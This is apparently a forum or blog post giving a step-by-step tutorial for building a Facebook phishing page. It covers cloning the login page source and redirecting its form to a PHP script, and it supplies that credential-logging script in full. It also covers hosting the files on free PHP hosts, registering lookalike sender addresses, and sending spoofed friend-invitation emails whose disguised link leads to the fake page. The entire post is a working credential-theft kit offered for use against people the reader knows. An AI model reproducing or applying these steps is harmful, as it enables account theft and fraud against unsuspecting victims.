ONE!:
go to "www.facebook.com/login.php" and right click on some white space on the page and press "view source code". ALOT of text is gonna appear, copy it all to notepad.
TWO!:
Now we need to change a few things in the code. So that the login button sends the info to our file instead of the facebook login. We do that by editing the action of the code. So press Edit >> search. and search "action=" without the quotes. you should find this
![[Image: screen1pf8.png]](http://img354.imageshack.us/img354/7116/screen1pf8.png)
The big red ring that circles the "action=" you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as "index.PHP" (not htm!)
THREE!:
Now that we changed the action to next.php, we should also make a "next.php". open up notepad again. And write this:
Quote:$handle = fopen("passwords.txt", "a");foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");}fwrite($handle, "\r\n");fclose($handle);exit;?>
Save this as "next.php"
Note: for security you should rename "passwords.txt" to something else.
now make a text file called "passwords.txt" or whatever you renamed the file to in the "next.php", leave this document blank.
FOUR!:
Upload the 3 files "index.php", "next.php" and "passwords.txt" (or whatever the password file is called) to a subdomain hosting site. THEY MUST SUPPORT .PHP! i suggest these: 110mb.com, spam.com or 007sites.com. When you made an account you should upload the 3 files.
Congratz. You have yourself a working Phisher site!
FIVE!:
now we would like to send spoof emails out. To do that we should first make an email account. which starts with facebook@. or something that looks alike. like this FACEB0OK@hotmail.com or something like that. You should either use Gmail, Live, or hotmail. or you could get a mail like this "facebook@noreply.com" soemthing like that. but eventually that would cost. When your email is set go to step six.
SIX!:
Copy the content of an original Facebook friendship invitation email and paste it into a new mail. DONT SENT YET!
remove the hyperlink from this link:
http:/www.facebook.com/n/?reqs.php
Mark it and push the Add hyperlink button
![[Image: screen2jj5.png]](http://img117.imageshack.us/img117/6243/screen2jj5.png)
Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page.. Thats pretty kewl. Now i belive your ready to send your spoof emails to everybody you know. and hopefully some of them will fall for it.
ليست هناك تعليقات:
إرسال تعليق